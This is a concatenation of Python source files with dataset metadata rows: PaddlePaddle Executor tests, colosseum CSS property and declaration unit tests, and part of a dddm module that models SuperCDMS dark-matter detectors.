    exe = fluid.Executor(place)
    train_program = fluid.Program()
    startup_program = fluid.Program()
    startup_program.random_seed = 33
    train_program.random_seed = 33
    np.random.seed(33)
    with fluid.unique_name.guard():
        with fluid.program_guard(train_program, startup_program):
            data = fluid.layers.data(name='X', shape=[1], dtype='float32')
            hidden = fluid.layers.fc(input=data, size=10)
            loss = fluid.layers.mean(hidden)
            fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
            startup_program.random_seed = 1
    exe.run(startup_program)
    x = np.ones(shape=(10, 1)).astype('float32')
    compiled_prog = compiler.CompiledProgram(
        train_program).with_data_parallel(loss_name=loss.name)
    if not fluid.is_compiled_with_cuda():
        os.environ["CPU_NUM"] = "2"
    else:
        os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
    for _ in range(1000):
        loss_data = exe.run(compiled_prog,
                            feed={"X": x},
                            fetch_list=[loss.name],
                            feed_var_name="f",
                            fetch_var_name="c")[0]
    if platform.system() in ("Darwin", "Linux"):
        tools.compare(loss_data, [-1.9068239, -1.9068239])
    else:
        tools.compare(loss_data, [-1.9068239])
def test_Executor5():
    """use_program_cache=True should be faster than False.

    Runs the same seeded training twice — once with the program cache on,
    once off — checks both converge to the reference loss, and asserts
    the cached run is faster.
    NOTE(review): a wall-clock comparison like this is inherently flaky on
    loaded CI machines.
    """
    def train_once(use_cache):
        """Build, train 1000 steps, verify the loss; return elapsed seconds."""
        if fluid.is_compiled_with_cuda():
            place = fluid.CUDAPlace(0)
        else:
            place = fluid.CPUPlace()
        exe = fluid.Executor(place)
        train_program = fluid.Program()
        startup_program = fluid.Program()
        startup_program.random_seed = 33
        train_program.random_seed = 33
        np.random.seed(33)
        with fluid.unique_name.guard():
            with fluid.program_guard(train_program, startup_program):
                data = fluid.layers.data(name='X', shape=[1], dtype='float32')
                hidden = fluid.layers.fc(input=data, size=10)
                loss = fluid.layers.mean(hidden)
                fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
                startup_program.random_seed = 1
        exe.run(startup_program)
        x = np.ones(shape=(10, 1)).astype('float32')
        if not fluid.is_compiled_with_cuda():
            os.environ["CPU_NUM"] = "2"
        start = time.time()
        for _ in range(1000):
            loss_data = exe.run(train_program,
                                feed={"X": x},
                                fetch_list=[loss.name],
                                use_program_cache=use_cache)[0]
        elapsed = time.time() - start
        print(elapsed)
        tools.compare(loss_data, [-1.9068239])
        return elapsed

    end1 = train_once(True)
    end2 = train_once(False)
    assert end2 > end1
def test_Executor6():
    """With return_numpy=False the fetch result must be a LoDTensor.

    Verified by looking for the LoDTensor type name in the repr of the
    fetched result.
    """
    if fluid.is_compiled_with_cuda():
        place = fluid.CUDAPlace(0)
    else:
        place = fluid.CPUPlace()
    exe = fluid.Executor(place)
    train_program = fluid.Program()
    startup_program = fluid.Program()
    startup_program.random_seed = 33
    train_program.random_seed = 33
    np.random.seed(33)
    with fluid.unique_name.guard():
        with fluid.program_guard(train_program, startup_program):
            data = fluid.layers.data(name='X', shape=[1], dtype='float32')
            hidden = fluid.layers.fc(input=data, size=10)
            loss = fluid.layers.mean(hidden)
            fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
            startup_program.random_seed = 1
    exe.run(startup_program)
    x = np.ones(shape=(10, 1)).astype('float32')
    compiled_prog = compiler.CompiledProgram(
        train_program).with_data_parallel(loss_name=loss.name)
    if not fluid.is_compiled_with_cuda():
        os.environ["CPU_NUM"] = "2"
    for _ in range(1000):
        loss_data = exe.run(compiled_prog,
                            feed={"X": x},
                            fetch_list=[loss.name],
                            return_numpy=False)
    assert "paddle.fluid.core_avx.LoDTensor" in str(loss_data)
def test_Executor7():
    """Run the whole train cycle inside an explicit (non-global) scope.

    Everything — startup run included — happens under a scope_guard on a
    fresh Scope, and exe.run is additionally given ``scope=`` explicitly.
    """
    if fluid.is_compiled_with_cuda():
        place = fluid.CUDAPlace(0)
    else:
        place = fluid.CPUPlace()
    exe = fluid.Executor(place)
    train_program = fluid.Program()
    startup_program = fluid.Program()
    startup_program.random_seed = 33
    train_program.random_seed = 33
    np.random.seed(33)
    fkscope = fluid.Scope()
    with fluid.scope_guard(fkscope):
        with fluid.unique_name.guard():
            with fluid.program_guard(train_program, startup_program):
                data = fluid.layers.data(name='X', shape=[1], dtype='float32')
                hidden = fluid.layers.fc(input=data, size=10)
                loss = fluid.layers.mean(hidden)
                fluid.optimizer.SGD(learning_rate=0.01).minimize(loss)
                startup_program.random_seed = 1
        # Startup run executes under the guarded scope, so parameters
        # live in fkscope — the explicit scope= below must find them.
        exe.run(startup_program)
        x = np.ones(shape=(10, 1)).astype('float32')
        compiled_prog = compiler.CompiledProgram(
            train_program).with_data_parallel(loss_name=loss.name)
        if not fluid.is_compiled_with_cuda():
            os.environ["CPU_NUM"] = "2"
        else:
            os.environ["CUDA_VISIBLE_DEVICES"] = "0, 1"
        for _ in range(1000):
            loss_data = exe.run(compiled_prog,
                                feed={"X": x},
                                fetch_list=[loss.name],
                                scope=fkscope)[0]
        if platform.system() in ("Darwin", "Linux"):
            tools.compare(loss_data, [-1.9068239, -1.9068239])
        else:
            tools.compare(loss_data, [-1.9068239])
| 39.636612
| 78
| 0.562625
| 1,683
| 14,507
| 4.674985
| 0.104575
| 0.074733
| 0.064057
| 0.041052
| 0.839731
| 0.839731
| 0.825241
| 0.825241
| 0.825241
| 0.825241
| 0
| 0.034918
| 0.322879
| 14,507
| 365
| 79
| 39.745205
| 0.766059
| 0.068725
| 0
| 0.864583
| 0
| 0
| 0.027214
| 0.00233
| 0
| 0
| 0
| 0
| 0.03125
| 1
| 0.034722
| false
| 0
| 0.024306
| 0
| 0.059028
| 0.006944
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb77b4dd7b416b42abd7b6197143de0f140d07b3
| 19,159
|
py
|
Python
|
tests/test_declaration.py
|
newbazz/colosseum
|
5089a31ccca0df6c0c0aa20bdf7b5888007d45e7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_declaration.py
|
newbazz/colosseum
|
5089a31ccca0df6c0c0aa20bdf7b5888007d45e7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_declaration.py
|
newbazz/colosseum
|
5089a31ccca0df6c0c0aa20bdf7b5888007d45e7
|
[
"BSD-3-Clause"
] | null | null | null |
from unittest import TestCase
from colosseum import engine as css_engine
from colosseum.colors import GOLDENROD, NAMED_COLOR, REBECCAPURPLE
from colosseum.constants import AUTO, BLOCK, INLINE, TABLE, Choices
from colosseum.declaration import CSS, validated_property
from colosseum.units import percent, px
from .utils import TestNode
class PropertyChoiceTests(TestCase):
    """Exercise validated_property with each kind of Choices restriction."""

    def _assert_rejected(self, obj, *candidates):
        # Each candidate assignment must raise ValueError, in order.
        for candidate in candidates:
            with self.assertRaises(ValueError):
                obj.prop = candidate

    def _assert_error_message(self, obj, valid_values):
        # Assigning 'invalid' must raise with the full valid-values listing.
        try:
            obj.prop = 'invalid'
            self.fail('Should raise ValueError')
        except ValueError as v:
            self.assertEqual(
                str(v),
                "Invalid value 'invalid' for CSS property 'prop'; "
                "Valid values are: " + valid_values
            )

    def test_none(self):
        class MyObject:
            prop = validated_property('prop', choices=Choices(None), initial=None)

        obj = MyObject()
        self.assertIsNone(obj.prop)
        self._assert_rejected(
            obj, 10, 20 * px, 30 * percent, REBECCAPURPLE, '#112233', 'a', 'b')
        obj.prop = None
        obj.prop = 'none'
        # Check the error message
        self._assert_error_message(obj, 'none')

    def test_allow_length(self):
        class MyObject:
            prop = validated_property('prop', choices=Choices(length=True), initial=0)

        obj = MyObject()
        self.assertEqual(obj.prop, 0 * px)
        obj.prop = 10
        obj.prop = 20 * px
        obj.prop = 30 * percent
        self._assert_rejected(
            obj, REBECCAPURPLE, '#112233', 'a', 'b', None, 'none')
        # Check the error message
        self._assert_error_message(obj, '<length>')

    def test_allow_percentage(self):
        class MyObject:
            prop = validated_property(
                'prop', choices=Choices(percentage=True), initial=99 * percent)

        obj = MyObject()
        self.assertEqual(obj.prop, 99 * percent)
        self._assert_rejected(obj, 10, 20 * px)
        obj.prop = 30 * percent
        self._assert_rejected(
            obj, REBECCAPURPLE, '#112233', 'a', 'b', None, 'none')
        # Check the error message
        self._assert_error_message(obj, '<percentage>')

    def test_allow_integer(self):
        class MyObject:
            prop = validated_property('prop', choices=Choices(integer=True), initial=0)

        obj = MyObject()
        self.assertEqual(obj.prop, 0)
        obj.prop = 10
        self._assert_rejected(
            obj, 20 * px, 30 * percent, REBECCAPURPLE, '#112233',
            'a', 'b', None, 'none')
        # Check the error message
        self._assert_error_message(obj, '<integer>')

    def test_allow_color(self):
        class MyObject:
            prop = validated_property(
                'prop', choices=Choices(color=True), initial='goldenrod')

        obj = MyObject()
        self.assertEqual(obj.prop, NAMED_COLOR[GOLDENROD])
        self._assert_rejected(obj, 10, 20 * px, 30 * percent)
        obj.prop = REBECCAPURPLE
        obj.prop = '#112233'
        self._assert_rejected(obj, 'a', 'b', None, 'none')
        # Check the error message
        self._assert_error_message(obj, '<color>')

    def test_values(self):
        class MyObject:
            prop = validated_property(
                'prop', choices=Choices('a', 'b', None), initial='a')

        obj = MyObject()
        self.assertEqual(obj.prop, 'a')
        self._assert_rejected(
            obj, 10, 20 * px, 30 * percent, REBECCAPURPLE, '#112233')
        obj.prop = 'a'
        obj.prop = 'b'
        obj.prop = None
        obj.prop = 'none'
        # Check the error message
        self._assert_error_message(obj, 'a, b, none')

    def test_all_choices(self):
        class MyObject:
            prop = validated_property('prop', choices=Choices(
                'a', 'b', None,
                integer=True, length=True, percentage=True, color=True
            ), initial=None)

        obj = MyObject()
        obj.prop = 10
        obj.prop = 20 * px
        obj.prop = 30 * percent
        obj.prop = REBECCAPURPLE
        obj.prop = '#112233'
        obj.prop = 'a'
        obj.prop = 'b'
        obj.prop = None
        obj.prop = 'none'
        # Check the error message
        self._assert_error_message(
            obj, '<color>, <integer>, <length>, <percentage>, a, b, none')

    def test_string_symbol(self):
        class MyObject:
            prop = validated_property('prop', choices=Choices(AUTO, None), initial=None)

        obj = MyObject()
        # Set a symbolic value using the string value of the symbol
        # We can't just use the string directly, though - that would
        # get optimized by the compiler. So we create a string and
        # transform it into the value we want.
        val = 'AUTO'
        obj.prop = val.lower()
        # Both equality and instance checking should work.
        self.assertEqual(obj.prop, AUTO)
        self.assertIs(obj.prop, AUTO)
class CssDeclarationTests(TestCase):
    """Behavioral tests for the CSS declaration object and its dirty flag."""

    def _assert_margin(self, node, expected):
        # Check the 4-tuple shorthand and every directional accessor at once.
        top, right, bottom, left = expected
        self.assertEqual(node.style.margin, expected)
        self.assertEqual(node.style.margin_top, top)
        self.assertEqual(node.style.margin_right, right)
        self.assertEqual(node.style.margin_bottom, bottom)
        self.assertEqual(node.style.margin_left, left)

    def test_engine(self):
        node = TestNode(style=CSS())
        self.assertEqual(node.style.engine(), css_engine)

    def test_auto_default_property(self):
        node = TestNode(style=CSS())
        node.layout.dirty = None
        # Default value is AUTO
        self.assertIs(node.style.width, AUTO)
        self.assertIsNone(node.style.dirty)
        # Modify the value
        node.style.width = 10
        self.assertEqual(node.style.width, 10)
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Set the value to the same value.
        # Dirty flag is not set.
        node.style.width = 10
        self.assertEqual(node.style.width, 10)
        self.assertFalse(node.style.dirty)
        # Set the value to something new
        # Dirty flag is set.
        node.style.width = 20
        self.assertEqual(node.style.width, 20)
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Clear the property
        del node.style.width
        self.assertIs(node.style.width, AUTO)
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Clear the property again.
        # The underlying attribute won't exist, so this
        # should be a no-op.
        del node.style.width
        self.assertIs(node.style.width, AUTO)
        self.assertFalse(node.style.dirty)

    def test_0_default_property(self):
        node = TestNode(style=CSS())
        node.layout.dirty = None
        # Default value is 0
        self.assertEqual(node.style.border_top_width, 0)
        self.assertIsNone(node.style.dirty)
        # Modify the value
        node.style.border_top_width = 10
        self.assertEqual(node.style.border_top_width, 10)
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Set the value to the same value.
        # Dirty flag is not set.
        node.style.border_top_width = 10
        self.assertEqual(node.style.border_top_width, 10)
        self.assertFalse(node.style.dirty)
        # Set the value to something new
        # Dirty flag is set.
        node.style.border_top_width = 20
        self.assertEqual(node.style.border_top_width, 20)
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Clear the property
        del node.style.border_top_width
        self.assertEqual(node.style.border_top_width, 0)
        self.assertTrue(node.style.dirty)

    def test_None_default_property(self):
        node = TestNode(style=CSS())
        node.layout.dirty = None
        # Default value is None
        self.assertIsNone(node.style.max_width)
        self.assertIsNone(node.style.dirty)
        # Modify the value
        node.style.max_width = 10
        self.assertEqual(node.style.max_width, 10)
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Set the value to the same value.
        # Dirty flag is not set.
        node.style.max_width = 10
        self.assertEqual(node.style.max_width, 10)
        self.assertFalse(node.style.dirty)
        # Set the value to something new
        # Dirty flag is set.
        node.style.max_width = 20
        self.assertEqual(node.style.max_width, 20)
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Clear the property
        del node.style.max_width
        self.assertIsNone(node.style.max_width)
        self.assertTrue(node.style.dirty)

    def test_property_with_choices(self):
        node = TestNode(style=CSS())
        node.layout.dirty = None
        # Default value is INLINE
        self.assertIs(node.style.display, INLINE)
        self.assertIsNone(node.style.dirty)
        # Try to provide a value that isn't on the choices list
        with self.assertRaises(ValueError):
            node.style.display = 10
        # Use a valid value
        node.style.display = BLOCK
        self.assertIs(node.style.display, BLOCK)
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Set the value to the same value.
        # Dirty flag is not set.
        node.style.display = BLOCK
        self.assertIs(node.style.display, BLOCK)
        self.assertFalse(node.style.dirty)
        # Set the value to something new
        # Dirty flag is set.
        node.style.display = TABLE
        self.assertIs(node.style.display, TABLE)
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Clear the property
        del node.style.display
        self.assertIs(node.style.display, INLINE)
        self.assertTrue(node.style.dirty)

    def test_directional_property(self):
        node = TestNode(style=CSS())
        node.layout.dirty = None
        # Default value is 0
        self._assert_margin(node, (0, 0, 0, 0))
        self.assertIsNone(node.style.dirty)
        # Set a value in one axis
        node.style.margin_top = 10
        self._assert_margin(node, (10, 0, 0, 0))
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Set a value directly with a single item
        node.style.margin = (10,)
        self._assert_margin(node, (10, 10, 10, 10))
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Set a value directly with a single item
        node.style.margin = 30
        self._assert_margin(node, (30, 30, 30, 30))
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Set a value directly with a 2 values
        node.style.margin = (10, 20)
        self._assert_margin(node, (10, 20, 10, 20))
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Set a value directly with a 3 values
        node.style.margin = (10, 20, 30)
        self._assert_margin(node, (10, 20, 30, 20))
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Set a value directly with a 4 values
        node.style.margin = (10, 20, 30, 40)
        self._assert_margin(node, (10, 20, 30, 40))
        self.assertTrue(node.style.dirty)
        # Set a value directly with an invalid number of values
        with self.assertRaises(ValueError):
            node.style.margin = ()
        with self.assertRaises(ValueError):
            node.style.margin = (10, 20, 30, 40, 50)
        # Clean the layout
        node.layout.dirty = False
        # Clear a value on one axis
        del node.style.margin_top
        self._assert_margin(node, (0, 20, 30, 40))
        self.assertTrue(node.style.dirty)
        # Restore the top margin
        node.style.margin_top = 10
        # Clean the layout
        node.layout.dirty = False
        # Clear a value directly
        del node.style.margin
        self._assert_margin(node, (0, 0, 0, 0))
        self.assertTrue(node.style.dirty)

    def test_set_multiple_properties(self):
        node = TestNode(style=CSS())
        node.layout.dirty = None
        node.style.set(width=10, height=20)
        self.assertEqual(node.style.width, 10)
        self.assertEqual(node.style.height, 20)
        self.assertIs(node.style.top, AUTO)
        self.assertTrue(node.style.dirty)
        # Clear properties
        node.style.set(width=None, top=30)
        self.assertIs(node.style.width, AUTO)
        self.assertEqual(node.style.height, 20)
        self.assertEqual(node.style.top, 30)
        self.assertTrue(node.style.dirty)
        # Clean the layout
        node.layout.dirty = False
        # Setting a non-property
        with self.assertRaises(NameError):
            node.style.set(not_a_property=10)
        self.assertFalse(node.style.dirty)

    def test_str(self):
        node = TestNode(style=CSS())
        node.layout.dirty = None
        node.style.set(
            width=10,
            height=20,
            margin=(30, 40, 50, 60),
            display=BLOCK
        )
        self.assertEqual(
            str(node.style),
            "display: block; height: 20px; "
            "margin-bottom: 50px; margin-left: 60px; "
            "margin-right: 40px; margin-top: 30px; width: 10px"
        )
| 32.038462
| 101
| 0.594603
| 2,260
| 19,159
| 4.990265
| 0.077876
| 0.111722
| 0.102766
| 0.12981
| 0.853786
| 0.834368
| 0.793669
| 0.738695
| 0.724153
| 0.687711
| 0
| 0.025149
| 0.306801
| 19,159
| 597
| 102
| 32.092127
| 0.824034
| 0.100057
| 0
| 0.726161
| 0
| 0.002445
| 0.060814
| 0
| 0
| 0
| 0
| 0
| 0.408313
| 1
| 0.03912
| false
| 0
| 0.017115
| 0
| 0.080685
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fb927186df338b0e3908bf5b3088e6f7cda90bb7
| 11,924
|
py
|
Python
|
dddm/detectors/super_cdms.py
|
JoranAngevaare/dddm
|
3461e37984bac4d850beafecc9d1881b84fb226c
|
[
"MIT"
] | null | null | null |
dddm/detectors/super_cdms.py
|
JoranAngevaare/dddm
|
3461e37984bac4d850beafecc9d1881b84fb226c
|
[
"MIT"
] | 85
|
2021-09-20T12:08:53.000Z
|
2022-03-30T12:48:06.000Z
|
dddm/detectors/super_cdms.py
|
JoranAngevaare/dddm
|
3461e37984bac4d850beafecc9d1881b84fb226c
|
[
"MIT"
] | null | null | null |
import typing as ty
from abc import ABC
from .experiment import Experiment, lindhard_quenching_factor, _get_nr_resolution
import numpy as np
import dddm
from functools import partial
export, __all__ = dddm.exporter()
class _BaseSuperCdms(Experiment, ABC):
    """Base class of superCDMS to introduce shared properties"""
    location = "SNOLAB"

    # Parameters needed for eq. 3, 4 of https://arxiv.org/pdf/1610.00006.pdf
    # Since they are not directly used, they are not set as class attributes
    _energy_parameters = dict(
        si_hv={
            'Z': 14,
            'k': 0.161,
            'epsilon': 0.003,
            'e_delta_v': 0.1,
            'e_thr_phonon': 100e-3,
            'sigma_phonon': 5e-3,
            'sigma_ion': np.nan,  # Only phonons
        },
        si_izip={
            'Z': 14,
            'k': 0.161,
            'epsilon': 0.003,
            'e_delta_v': 0.008,
            'e_thr_phonon': 175e-3,
            'sigma_phonon': 25e-3,
            'sigma_ion': 110e-3,
        },
        ge_hv={
            'Z': 32,
            'k': 0.162,
            'epsilon': 0.00382,
            'e_delta_v': 0.1,
            'e_thr_phonon': 100e-3,
            'sigma_phonon': 10e-3,
            'sigma_ion': np.nan,  # Only phonons
        },
        ge_izip={
            'Z': 32,
            'k': 0.162,
            'epsilon': 0.00382,
            'e_delta_v': 0.006,
            'e_thr_phonon': 350e-3,
            'sigma_phonon': 50e-3,
            'sigma_ion': 100e-3,
        },
    )

    def _phonon_field_to_ee(self, field):
        """Convert the phonon-energy entry *field* of this detector's
        configuration to electron-equivalent energy."""
        conf = self._energy_parameters[self.detector_key]
        return energy_ee_from_energy_phonon(
            e_ph=conf[field],
            e_delta_v=conf['e_delta_v'],
            epsilon=conf['epsilon'],
        )

    def get_energy_thr_ee_from_phonon_thr(self) -> ty.Union[float, int]:
        """get the energy threshold (ee) based on the energy_parameters"""
        assert self.interaction_type == 'migdal_SI'
        return self._phonon_field_to_ee('e_thr_phonon')

    def get_energy_res_ee_from_phonon_res(self) -> ty.Union[float, int]:
        """get the energy resolution (ee) based on the energy_parameters"""
        assert self.interaction_type == 'migdal_SI'
        return self._phonon_field_to_ee('sigma_phonon')

    def energy_nr_to_detectable_energy_function(self) -> ty.Callable:
        """
        Get phonon energy (hv) or ionization energy (izip) from nuclear recoil energy
        """
        assert self.interaction_type == 'SI'
        det_key = self.detector_key
        conf = self._energy_parameters[det_key]
        if 'izip' in det_key:
            return partial(
                energy_ionization_from_e_nr,
                Z=conf['Z'],
                k=conf['k'],
            )
        if 'hv' in det_key:
            return partial(
                energy_phonon_from_energy_nr,
                Z=conf['Z'],
                k=conf['k'],
                e_delta_v=conf['e_delta_v'],
                epsilon=conf['epsilon'],
            )
        raise ValueError(f'got {det_key}?!')

    @property
    def detector_key(self) -> str:
        """Key into _energy_parameters: '<material>_hv' or '<material>_izip'."""
        material = self.target_material.lower()
        name = self.detector_name.lower()
        if 'hv' in name:
            return f'{material}_hv'
        assert 'izip' in name
        return f'{material}_izip'
@export
class SuperCdmsHvGeNr(_BaseSuperCdms):
    """SuperCDMS HV germanium detector, nuclear-recoil channel."""
    detector_name = 'SuperCDMS_HV_Ge_NR'
    target_material = 'Ge'
    interaction_type = 'SI'
    __version__ = '0.0.0'

    exposure_tonne_year = 44 * 1.e-3  # Tonne year
    energy_threshold_kev = 40. / 1e3  # table VIII, Enr
    cut_efficiency = 0.85  # p. 11, right column
    detection_efficiency = 0.85  # p. 11, left column NOTE: ER type!

    def resolution(self, energies_in_kev):
        """Flat resolution"""
        nr_to_phonon = self.energy_nr_to_detectable_energy_function()
        phonon_sigma = self._energy_parameters[self.detector_key]['sigma_phonon']
        return _get_nr_resolution(energies_in_kev, nr_to_phonon, phonon_sigma)

    def background_function(self, energies_in_kev):
        """Flat bg rate"""
        bg_rate_nr = 27  # counts/kg/keV/year
        conv_units = 1.0e3  # Tonne
        return self._flat_background(len(energies_in_kev),
                                     bg_rate_nr * conv_units)
@export
class SuperCdmsHvSiNr(_BaseSuperCdms):
    """SuperCDMS HV silicon detector, nuclear-recoil (SI) analysis."""
    detector_name = 'SuperCDMS_HV_Si_NR'
    target_material = 'Si'
    interaction_type = 'SI'
    __version__ = '0.0.0'

    exposure_tonne_year = 9.6 * 1.e-3  # tonne * year
    energy_threshold_kev = 78. / 1e3  # table VIII, Enr
    cut_efficiency = 0.85  # p. 11, right column
    detection_efficiency = 0.85  # p. 11, left column NOTE: ER type!

    def resolution(self, energies_in_kev):
        """Flat phonon resolution, mapped onto nuclear-recoil energies."""
        conf = self._energy_parameters[self.detector_key]
        return _get_nr_resolution(energies_in_kev,
                                  self.energy_nr_to_detectable_energy_function(),
                                  conf['sigma_phonon'])

    def background_function(self, energies_in_kev):
        """Flat background rate."""
        rate_per_kg = 300  # counts/kg/keV/year
        # Convert kg -> tonne for the flat-background helper.
        return self._flat_background(len(energies_in_kev), rate_per_kg * 1.0e3)
@export
class SuperCdmsIzipGeNr(_BaseSuperCdms):
    """SuperCDMS iZIP germanium detector, nuclear-recoil (SI) analysis."""
    detector_name = 'SuperCDMS_iZIP_Ge_NR'
    target_material = 'Ge'
    interaction_type = 'SI'
    __version__ = '0.0.0'

    exposure_tonne_year = 56 * 1.e-3  # tonne * year
    energy_threshold_kev = 272. / 1e3  # table VIII, Enr
    cut_efficiency = 0.75  # p. 11, right column
    detection_efficiency = 0.85  # p. 11, left column

    def resolution(self, energies_in_kev):
        """Flat ionization resolution, mapped onto nuclear-recoil energies."""
        conf = self._energy_parameters[self.detector_key]
        return _get_nr_resolution(energies_in_kev,
                                  self.energy_nr_to_detectable_energy_function(),
                                  conf['sigma_ion'])

    def background_function(self, energies_in_kev):
        """Flat background rate."""
        rate_per_kg = 3300e-6  # counts/kg/keV/year
        # Convert kg -> tonne for the flat-background helper.
        return self._flat_background(len(energies_in_kev), rate_per_kg * 1.0e3)
@export
class SuperCdmsIzipSiNr(_BaseSuperCdms):
    """SuperCDMS iZIP silicon detector, nuclear-recoil (SI) analysis."""
    detector_name = 'SuperCDMS_iZIP_Si_NR'
    target_material = 'Si'
    interaction_type = 'SI'
    __version__ = '0.0.0'

    exposure_tonne_year = 4.8 * 1.e-3  # tonne * year
    energy_threshold_kev = 166. / 1e3  # table VIII, Enr
    cut_efficiency = 0.75  # p. 11, right column
    detection_efficiency = 0.85  # p. 11, left column

    def resolution(self, energies_in_kev):
        """Flat ionization resolution, mapped onto nuclear-recoil energies."""
        conf = self._energy_parameters[self.detector_key]
        return _get_nr_resolution(energies_in_kev,
                                  self.energy_nr_to_detectable_energy_function(),
                                  conf['sigma_ion'])

    def background_function(self, energies_in_kev):
        """Flat background rate."""
        rate_per_kg = 2900e-6  # counts/kg/keV/year
        # Convert kg -> tonne for the flat-background helper.
        return self._flat_background(len(energies_in_kev), rate_per_kg * 1.0e3)
@export
class SuperCdmsHvGeMigdal(_BaseSuperCdms):
    """SuperCDMS HV germanium detector, Migdal (ER-like) analysis."""
    detector_name = 'SuperCDMS_HV_Ge_Migdal'
    target_material = 'Ge'
    interaction_type = 'migdal_SI'
    __version__ = '0.0.0'

    exposure_tonne_year = 44 * 1.e-3  # tonne * year
    cut_efficiency = 0.85  # p. 11, right column
    detection_efficiency = 0.5  # p. 11, left column NOTE: migdal is ER type!

    @property
    def energy_threshold_kev(self):
        """Threshold in keVee, derived from the phonon threshold."""
        return self.get_energy_thr_ee_from_phonon_thr()

    def resolution(self, energies_in_kev):
        """Flat resolution in keVee, derived from the phonon resolution."""
        return self._flat_resolution(len(energies_in_kev),
                                     self.get_energy_res_ee_from_phonon_res())

    def background_function(self, energies_in_kev):
        """Flat background rate."""
        rate_per_kg = 27  # counts/kg/keV/year
        # Convert kg -> tonne for the flat-background helper.
        return self._flat_background(len(energies_in_kev), rate_per_kg * 1.0e3)
@export
class SuperCdmsHvSiMigdal(_BaseSuperCdms):
    """SuperCDMS HV silicon detector, Migdal (ER-like) analysis."""
    detector_name = 'SuperCDMS_HV_Si_Migdal'
    target_material = 'Si'
    interaction_type = 'migdal_SI'
    __version__ = '0.0.0'

    exposure_tonne_year = 9.6 * 1.e-3  # tonne * year
    cut_efficiency = 0.85  # p. 11, right column
    detection_efficiency = 0.675  # p. 11, left column NOTE: migdal is ER type!

    @property
    def energy_threshold_kev(self):
        """Threshold in keVee, derived from the phonon threshold."""
        return self.get_energy_thr_ee_from_phonon_thr()

    def resolution(self, energies_in_kev):
        """Flat resolution in keVee, derived from the phonon resolution."""
        return self._flat_resolution(len(energies_in_kev),
                                     self.get_energy_res_ee_from_phonon_res())

    def background_function(self, energies_in_kev):
        """Flat background rate."""
        rate_per_kg = 300  # counts/kg/keV/year
        # Convert kg -> tonne for the flat-background helper.
        return self._flat_background(len(energies_in_kev), rate_per_kg * 1.0e3)
@export
class SuperCdmsIzipGeMigdal(_BaseSuperCdms):
    """SuperCDMS iZIP germanium detector, Migdal (ER-like) analysis."""
    detector_name = 'SuperCDMS_iZIP_Ge_Migdal'
    target_material = 'Ge'
    interaction_type = 'migdal_SI'
    __version__ = '0.0.0'

    exposure_tonne_year = 56 * 1.e-3  # tonne * year
    cut_efficiency = 0.75  # p. 11, right column
    detection_efficiency = 0.5  # p. 11, left column NOTE: migdal is ER type!

    @property
    def energy_threshold_kev(self):
        """Threshold in keVee, derived from the phonon threshold."""
        return self.get_energy_thr_ee_from_phonon_thr()

    def resolution(self, energies_in_kev):
        """Flat resolution in keVee, derived from the phonon resolution."""
        return self._flat_resolution(len(energies_in_kev),
                                     self.get_energy_res_ee_from_phonon_res())

    def background_function(self, energies_in_kev):
        """Flat background rate."""
        rate_per_kg = 22  # counts/kg/keV/year
        # Convert kg -> tonne for the flat-background helper.
        return self._flat_background(len(energies_in_kev), rate_per_kg * 1.0e3)
@export
class SuperCdmsIzipSiMigdal(_BaseSuperCdms):
    """SuperCDMS iZIP silicon detector, Migdal (ER-like) analysis."""
    detector_name = 'SuperCDMS_iZIP_Si_Migdal'
    target_material = 'Si'
    interaction_type = 'migdal_SI'
    __version__ = '0.0.0'

    exposure_tonne_year = 4.8 * 1.e-3  # tonne * year
    cut_efficiency = 0.75  # p. 11, right column
    detection_efficiency = 0.675  # p. 11, left column NOTE: migdal is ER type!

    @property
    def energy_threshold_kev(self):
        """Threshold in keVee, derived from the phonon threshold."""
        return self.get_energy_thr_ee_from_phonon_thr()

    def resolution(self, energies_in_kev):
        """Flat resolution in keVee, derived from the phonon resolution."""
        return self._flat_resolution(len(energies_in_kev),
                                     self.get_energy_res_ee_from_phonon_res())

    def background_function(self, energies_in_kev):
        """Flat background rate."""
        rate_per_kg = 370  # counts/kg/keV/year
        # Convert kg -> tonne for the flat-background helper.
        return self._flat_background(len(energies_in_kev), rate_per_kg * 1.0e3)
def energy_ee_from_energy_phonon(e_ph, e_delta_v, epsilon):
    """Convert a phonon energy to electron-equivalent (ee) energy.

    Eq. 4 in https://arxiv.org/abs/1610.00006 rewritten to ee
    (`y`=1) and `eta`=1.
    """
    luke_gain = 1 + e_delta_v / epsilon
    return e_ph / luke_gain
